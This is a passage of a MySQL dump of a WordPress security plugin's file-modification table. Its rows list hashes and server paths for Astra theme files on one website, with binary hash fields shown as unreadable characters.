('?a<ø^ç}''_®Z', 'wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-color-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-color-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'G§U¹$.™ñE§o·Ÿ¹æ', 'Øtð5\\R¾¡ Ê¤>\\žªíÑÔ¥Óm”R\\Èê)¸6', '', 0, '?'),
('yáöƒ-š=†—cWÂÇ', 'wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥í£ìž.\Z„øœ‹±Yx', '¨/?ƒ‰ƒìãÒäº"q/é	Îójþí¿zµŒ]q', '', 0, '?'),
('Z÷(œd8­.3V„ó!J¿', 'wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-typo-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-typo-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á-ŒœiýÅ@Ÿ¼oh+L', '2òÊ*ÖIåÛ€ÞÉûò-´’†¡5`It†;0óß¶}', '', 0, '?'),
('úÛè¤Ë°aõ[«³rûp', 'wp-content/themes/astra/inc/addons/breadcrumbs/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ç_U¢d*ÚãÃ,ä{', 'ÖÃ‡Î™4*M]	ŽÛ,©Ë7]lîÎ§~[h™-©', '', 0, '?'),
('¡¢Úµô]V2À2óq1ß', 'wp-content/themes/astra/inc/addons/heading-colors/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­òNTèË±ïh¿³`+G\r', '¦Õ ÌÕà3…a×{”BnF6¿ÊŠêóøá7ÄKt5ç‰H', '', 0, '?'),
('«;ŠonwJ¿V×EÆ	ä›ù', 'wp-content/themes/astra/inc/addons/heading-colors/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'PøaÉ·…†Õµ–p÷þ"E', 'èù¹eÊD{	Î­ÂÕ>¶5Y>°åœõêòJv¶ª·', '', 0, '?'),
('ËH¾—cŽ\Z:Ñ—IZ…ßÈ^', 'wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6ï\rÅ!>3ŸÉÔ…¸Oâ', '…ÙD™v³³oB„2ÇÊÇÜf·%ªð{ó3‘', '', 0, '?'),
('Sÿú–¬-À¥Òf´‘%', 'wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£sj(®(h<é"ÔÛ¯P·', 'esQp…ú¢rˆdghdæç?ä_Ú\Zºðx…£§õ:[L', '', 0, '?'),
(' É&¿—M…‰ˆ6{1æ• \r', 'wp-content/themes/astra/inc/addons/heading-colors/customizer/class-astra-heading-colors-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/customizer/class-astra-heading-colors-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']ŠÇ.ä¨Q‡ê‘ô_\\\Z', 'U­?¦_²ŒŠÉ”t»ŠLŸ¶;ßš‡“åxýÀø]/', '', 0, '?'),
('ög½hŸiÓ[RÏ†^×ì', 'wp-content/themes/astra/inc/addons/heading-colors/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í³¦ÄqÔ’$$Q.çÚ', 'ï¡Ñ:£ýé×T°™1²ÑùWòmznÇ—}àÓsw¦', '', 0, '?'),
('îpç¥ ÈôÖ‚xÒ‰;', 'wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÉO¬=RÝ»-&k”²ƒ', '•š­¾^"jÉ¯ø/¿Lúÿ_ÎV*ßÚcÀ¿¯ŒJû	<', '', 0, '?'),
('‚îŽb¨Ë¶Å1t]ç', 'wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'wªØ÷/\\ÜÌAFL®W†¨', '¨cwJÕp†•^Tà˜*¦HowÈ¶7)×xC2vB', '', 0, '?'),
('åúððë4å?h}ô\\?fÙ', 'wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/scroll-to-top.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/assets/js/unminified/scroll-to-top.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›—3þyý6vçbS+w¬ò', 'Ï· íb¤ã#Þ“ISK+nñ+Uë¤ÝÆ‡š(—', '', 0, '?'),
('ÊR¢c¤Âì—F“ÏŽ¾˜', 'wp-content/themes/astra/inc/addons/scroll-to-top/class-astra-scroll-to-top.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/class-astra-scroll-to-top.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¼…‰4³v;^2÷]ðncÖ', 'þ;Ó¼†\Zƒ3YØ¢isàg‚¾»à&¯ÍÍ™$à’°=©', '', 0, '?'),
('&°éàùIÌˆÚ(³nv¬8', 'wp-content/themes/astra/inc/addons/scroll-to-top/classes/class-astra-scroll-to-top-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/classes/class-astra-scroll-to-top-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9ð	\r`[mË^jdCPQ', '1(Ñ´¼8¬Õ"i‹Ÿâ÷â}<Ù‚ÝY)"2¤C¼=¸GS', '', 0, '?'),
('êÌ49–êõÿµsÏ,ŸÃ$', 'wp-content/themes/astra/inc/addons/scroll-to-top/classes/customizer/class-astra-scroll-to-top-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/classes/customizer/class-astra-scroll-to-top-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J+X‚IÂ¡¦(±Â/þñn', 'º1-AN”ÔÄqº^é–ðg7ÉÿC×ªÃeR]M’5z«ô', '', 0, '?'),
('üŒ±qp…m5\\ƒšP—XdX', 'wp-content/themes/astra/inc/addons/scroll-to-top/css/dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/css/dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'O™f¶yb¹^2” û', 'tš°ýë”%ÍEËº@''h“žÓ(w\0vk¶åIÚ®‰', '', 0, '?'),
('¡¥Ý5|(wÿ/ªqxÉ™b', 'wp-content/themes/astra/inc/addons/scroll-to-top/css/static-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/scroll-to-top/css/static-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ô¢§¦&ˆV7½ª­¢Ù', 'ÀÌÜ?ïˆüHâ¾¶Ü8¸fºX®·&è1‹dÂ˜\Z­', '', 0, '?'),
('Š–½£’õï¡ù³~£>z(', 'wp-content/themes/astra/inc/addons/transparent-header/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w]àÓ%5Š!ñ´­ÖUi²', '¬f™+Ÿ_ÉA*?´Ôi/zQ@ü .O:CÞ,OƒRY¦', '', 0, '?'),
('ÑèãÌ¥ÑÆ°\rpXÙÎ_þo', 'wp-content/themes/astra/inc/addons/transparent-header/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '/L2=KÒ¢–…´\rH', 'y˜Ô…uQµÉu±2àœJhú*Ìk¿•/\Z', '', 0, '?'),
('å€«/ÂÞO9´JïøÄÖ', 'wp-content/themes/astra/inc/addons/transparent-header/class-astra-ext-transparent-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/class-astra-ext-transparent-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü(#1Â¬ï}|RÑð•', 'æ¢ûƒ_¿Ñm''ÐÜ¤ÓtYœÅE{ìö…OÊ—/M', '', 0, '?'),
('80\0—ëw\Z1`ŽrÃˆ', 'wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'CÈ,VBzÀ\rÏ7GÀJé', '•u{Xø¯?Ä^6ÓŽ+.ûX=ËáXÉô ¶µ±¦ƒ)î', '', 0, '?'),
(' G%ß·ù<i$€H`u', 'wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-markup.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-ext-transparent-header-markup.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØÅ ÁX”èS Üö´P‚˜', '?Z¡4¢Ú³´O,Brb(Äj^8p-Þ‚câÕ­ÚäÙ', '', 0, '?'),
(';†1|Ï]fIÎäzIëÖ™', 'wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-transparent-header-panels-and-sections.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/class-astra-transparent-header-panels-and-sections.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+¡p‰—''²4—¸\\q¯', 'DúoÕÿPŒ¤Ò¼69‡ÝPê*NåTNÔà¼ÿÃA¿Z¸', '', 0, '?'),
('îx]Ò8Ü~èÎþ;_·„±', 'wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''ÛÀ‰­I(2Õþ<ã\0ÊL', 'L;jL£8tw~:8™N´æ¼ãNÇÃÔ?|<&ŠvC', '', 0, '?'),
('Cðãœ²½*ûªpÉ', 'wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/header-sections-dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/dynamic-css/header-sections-dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ê|5Jù9òˆb\rbDxRN', 'Æ:¿Ú+¦)8•!™eï¶†ñ4ÆE¬)¬ËÕ³wéB', '', 0, '?'),
('4¹`JÃ2„µ\r› ¹2”Ù', 'wp-content/themes/astra/inc/addons/transparent-header/classes/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5Û¢ÚÐò»gp4Ì’/x', 'ÝíPÁ!Ô¨8aKu×•”lï¦Ä•ß —”ª}\rN8', '', 0, '?'),
('x9 ù½ÿ`ñ]‘pÆkœO', 'wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-colors-transparent-header-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-colors-transparent-header-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èü?Ÿ[P8ð½\r\0Áü”', 'Ïd7O\n0u>x“EDRsÚ¬X²ÈgØ“!À%ê°7l', '', 0, '?'),
('}“?ÜÛ¥Æu¾Ó m+d', 'wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-transparent-header-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/sections/class-astra-customizer-transparent-header-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ö†—\Zíþ@·£×ï(È°ù', '.ý]‚Ób½²ÞŒÚvöœ•\\Î|p»\Z µ', '', 0, '?'),
('ªg¨(\rÕ#ë=—Àß', 'wp-content/themes/astra/inc/addons/transparent-header/classes/sections/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/classes/sections/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5Û¢ÚÐò»gp4Ì’/x', 'ÝíPÁ!Ô¨8aKu×•”lï¦Ä•ß —”ª}\rN8', '', 0, '?'),
('WÛ=ÔÿìÊÓi‡Ì(', 'wp-content/themes/astra/inc/addons/transparent-header/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/transparent-header/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5Û¢ÚÐò»gp4Ì’/x', 'ÝíPÁ!Ô¨8aKu×•”lï¦Ä•ß —”ª}\rN8', '', 0, '?'),
('õ.ò3òK*Æt×6Ò¯™õ', 'wp-content/themes/astra/inc/admin-functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/admin-functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áC±¾¢*Ìüæ3`nõ', 'Ü/<#³Í44rX*ÓèTàÖ%uœ$>É*‡áºy', '', 0, '?'),
('$ùµ ÝbÖ ¶|9«™', 'wp-content/themes/astra/inc/assets/css/ast-builder-customizer-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-builder-customizer-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=ñß`„•‹œYxRb¼', 'šw–3jƒŸ¦ ÇÈžÙ½ž…Y&dŠ ÞˆX7ûC', '', 0, '?'),
('Çã\rBé«9RSsÜ¯', 'wp-content/themes/astra/inc/assets/css/ast-builder-customizer.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-builder-customizer.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9x÷©Ôuóâ¨0ÿŒ ', 'Ô`ëßç Q	í½¦ØvçÅ¥*¦''wUÝ*H_ŒÖ', '', 0, '?'),
('„aÊtâf\0Wå¶@^"', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ËcâEú‚¾Y{ÞPˆÏ"', 'rœhè$±h\0½[lVwIkkÌÒ8SºN%QõhƒƒWñ2', '', 0, '?'),
('Y8u%ãqÛ_ð', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor-dark.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ËcâEú‚¾Y{ÞPˆÏ"', 'rœhè$±h\0½[lVwIkkÌÒ8SºN%QõhƒƒWñ2', '', 0, '?'),
('\rïz‘sÝ¿&]WZK&]', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª‘vÁSô"ÈŠ–á•AGÖ', '¥ˆÑÛ–²kÇ“=âIG¾›e_h ØÕjfGÁ\\\0Äæ', '', 0, '?'),
('Åq†¿*>ÁMÑ+T', 'wp-content/themes/astra/inc/assets/css/ast-elementor-editor.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/ast-elementor-editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª‘vÁSô"ÈŠ–á•AGÖ', '¥ˆÑÛ–²kÇ“=âIG¾›e_h ØÕjfGÁ\\\0Äæ', '', 0, '?'),
('3''ó›Kha]Z;ýâ¿s­d', 'wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÒF÷§otõóDH1‹ã‘ñ', '—fÍ9YrŽÐØ4=úÍ÷CQØæ3Ólw†y×º³', '', 0, '?'),
('¾¸¬¨då€Í…›¾^\rÃ*…', 'wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-admin-menu-settings.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ý `û·Q:ª¯Ì4µë', '\Z¼PÈbLuŸàö-â®‰½ÅVXÎ9,\\''Ká', '', 0, '?'),
('FîŠw—lQ@ð)ð¹¼h[=', 'wp-content/themes/astra/inc/assets/css/astra-notices-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-notices-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žÓ]?Yk\rïLkˆãb', 'E|3Òr©#œnÝ@Añ16îß]Ó¾šÁe£Ît', '', 0, '?'),
('§‘>oJ}‚žÊ\ZiH·x·', 'wp-content/themes/astra/inc/assets/css/astra-notices.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/astra-notices.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`»¿ÉWXÝŽv`!v¦Ékä', ']¼ieŸpG¾?¨ëMbÊW¶3Ë/³†/Ù ÷Š)ˆ˜á', '', 0, '?'),
('iz¼Û\Zrp''qRõ‚', 'wp-content/themes/astra/inc/assets/css/block-editor-styles-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/block-editor-styles-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\r´•q+TM”tkÆÑ÷=', 'Êq_Ï˜H¯ëYì+«jÛrÅÒŸÿ-Uúw‡J­†', '', 0, '?'),
('¨¹a>Ùá@þ\r!—', 'wp-content/themes/astra/inc/assets/css/block-editor-styles.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/block-editor-styles.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½1³l‡\0WþÓ‚:Ãõ¨', ' Zâ„Ê`é8¥nzBs„¤é?ÍªÍ¨Õ&©Ùòh', '', 0, '?'),
('nü=:¹£e£h©qñ©G', 'wp-content/themes/astra/inc/assets/css/customizer-preview-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/customizer-preview-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']C¤ÌLµéZ»ePØƒ:è‹', '²‡FsØ:Æ	û´aÔ\ZoÃýºÂ	Å¨‡¿5A†–Ôª', '', 0, '?'),
('yÚù=DA;Sb$@ÍB', 'wp-content/themes/astra/inc/assets/css/customizer-preview.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/customizer-preview.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æ´çï~Þž™ç(=5»\ZÔ', 'Y~Ä©´bf˜HŽØÁÍ=ÙEå ü/ò[Û×5\0–2È', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
(',Ø®®W\Z^Qm€èH|Ë', 'wp-content/themes/astra/inc/assets/css/font-icon-picker-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/font-icon-picker-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì=+ß³üÉ`F˜²‰^/j%', 'JÓªmÅ«bÒ¿T´~''ˆ-««¸›\0&Øiyö"Þï', '', 0, '?'),
('1_úD_v³bÉ›-p„Ô*', 'wp-content/themes/astra/inc/assets/css/font-icon-picker.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/font-icon-picker.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eÄ…¡LP‹ØKš@·yª', 'ÃÏ¯ÃI×¬YbÏîÄÜ“fPÛÌKËy ‘%»…VÞˆT', '', 0, '?'),
('Í–1l}…X§óE³ë', 'wp-content/themes/astra/inc/assets/css/wp-editor-styles-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/wp-editor-styles-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÄGü\0€ñq™ôÞÃßa€ÙË', '°nR‹"5Wå“šÔL\0§d	#Áƒ½PBß‚\0_öA', '', 0, '?'),
('æ%ÁÀG`¶á3¹Ssõ›\\', 'wp-content/themes/astra/inc/assets/css/wp-editor-styles.css', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/css/wp-editor-styles.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'A_†TÌ3ã¿8ç2', '­qEEÃn†¿õ+†®­©ëÃq§§4íò#N¢ýö¹Å', '', 0, '?'),
('’`úÃ!ú|4\nå¶', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.eot', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.eot', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶9ÎrÈ¬6kø…T†“ù²»', '\\ž‰”Å" ÊIzy¯Xx.S¿Rÿ''¨®ÃPZŸ', '', 0, '?'),
('–ª”~ °QJ½§@.¶', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áA® e¾)j˜¸ Óc—²', '°—û»G9¡#Ì­øÄ0G[Æ&Ÿ ˆ¿ð˜mÏ¤˜', '', 0, '?'),
('ÊóC3€ŸÒxõ \Z––', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.ttf', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.ttf', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜1ÓÍlŠ»:z“C££¹', 'ºnR¡lÇÔ&jš''4Š”ˆÑŠñ•JÙ]«öíæ''', '', 0, '?'),
('\\ñ§fÅ¼ß‚>õFHù¯', 'wp-content/themes/astra/inc/assets/fonts/ast-logo.woff', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/fonts/ast-logo.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '&w2¡¡ÎµiõÚiÐ‘–¶', 'zt•Ø»+™ôìqk;P6pÞö®»=*x8ÏÚþ~œWá', '', 0, '?'),
('\Z¹mŒÙ5²¡ÍUªM', 'wp-content/themes/astra/inc/assets/images/ai-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/ai-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"Ù³º®)/ÆH=*7', '¶™ñ,b!„ Lh“2°L=$î@Øôr}).‹èÙ™', '', 0, '?'),
('7¶@òPóg3ÐGhî>þ', 'wp-content/themes/astra/inc/assets/images/astra-banner.png', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/astra-banner.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥ÔíìËÇ_KÒ_òCFµ`', 'gÈìZpKÞàv€os%Ùƒ?Öx:8àÅ:îË QëiÂ', '', 0, '?'),
('Ôû!½Ž1cÚÇû3UÈÉ', 'wp-content/themes/astra/inc/assets/images/astra-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/astra-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é‚$Á˜òw_;\0è­ä', 'eSË¨h	º€±3Ëì!òÃï«\\µùÚ|\nlhkJ«žZ', '', 0, '?'),
('¼l¼òžÁ©W|zð\Z', 'wp-content/themes/astra/inc/assets/images/astra.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/astra.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡/YíÆètPÝÊù5J:', 'f®/Å''›Ø¬÷Y\Zm''«odpºNšãUTT¢í*', '', 0, '?'),
('cd\Z&bÄ½SÓª¦«ö\0', 'wp-content/themes/astra/inc/assets/images/bb-logo.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/bb-logo.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ž5[	.Fßž÷¾Ï<¤', '	-ÚöÛû²Š‚)ÐËkâÒ¬õâ¸Bð«@¹ŒÑ¡©', '', 0, '?'),
('ñ\0‰ÊçÓr4qr9d''', 'wp-content/themes/astra/inc/assets/images/custom-layout.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/custom-layout.svg', 0, 'uiúEÄ5ÿIøm_/CZ', 'uiúEÄ5ÿIøm_/CZ', 'â…ÇÑÝ¥H¥nŽy\r·˜IHxÝq´)mÉß&0’', '', 0, '?'),
('F)Í`}	òÁrG¦ÝSâ?Ó', 'wp-content/themes/astra/inc/assets/images/ele-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/ele-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ïp0×ûìx¾ª”Çþl½', 'KœýÊR'' ƒQFPÃöË›øq¨Rät­œ¶p¹9RçO', '', 0, '?'),
('Žüæï"Ðf•{ú§9', 'wp-content/themes/astra/inc/assets/images/gb-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/gb-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü''Â6H\rÃÒÜ ¦\Z’', 'ÜZºac†xEïb‰‡$`L¤©Ý\\æOº#:Õ-¦Ÿ„', '', 0, '?'),
('I±ä=œ''Úz\n´ÓÓL—', 'wp-content/themes/astra/inc/assets/images/lightning-speed.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/lightning-speed.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢ñ]J\n%ó\Z54ù(íˆ', 'Ä§½Üg$ »Qº•U3g$øæc°†R`	þ|»', '', 0, '?'),
(' ~Æcƒ‘[¸Ëº©c\\3Ã', 'wp-content/themes/astra/inc/assets/images/page-header.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/page-header.svg', 0, 'yaù,íõ¾IjCáü*<´', 'yaù,íõ¾IjCáü*<´', '…’l$™H''SÊI<øX1EêiÑÅ/˜C˜Û›¾\\', '', 0, '?'),
('•JY`Ç%>Cæ2e07', 'wp-content/themes/astra/inc/assets/images/starter-content/about-us.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/about-us.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“ÎÝR\ZÖˆïµ;3v\Z', '¥ðÎ.ÀÉ—; ˆ>ëÈ?Æo]Ýàº#_k ', '', 0, '?'),
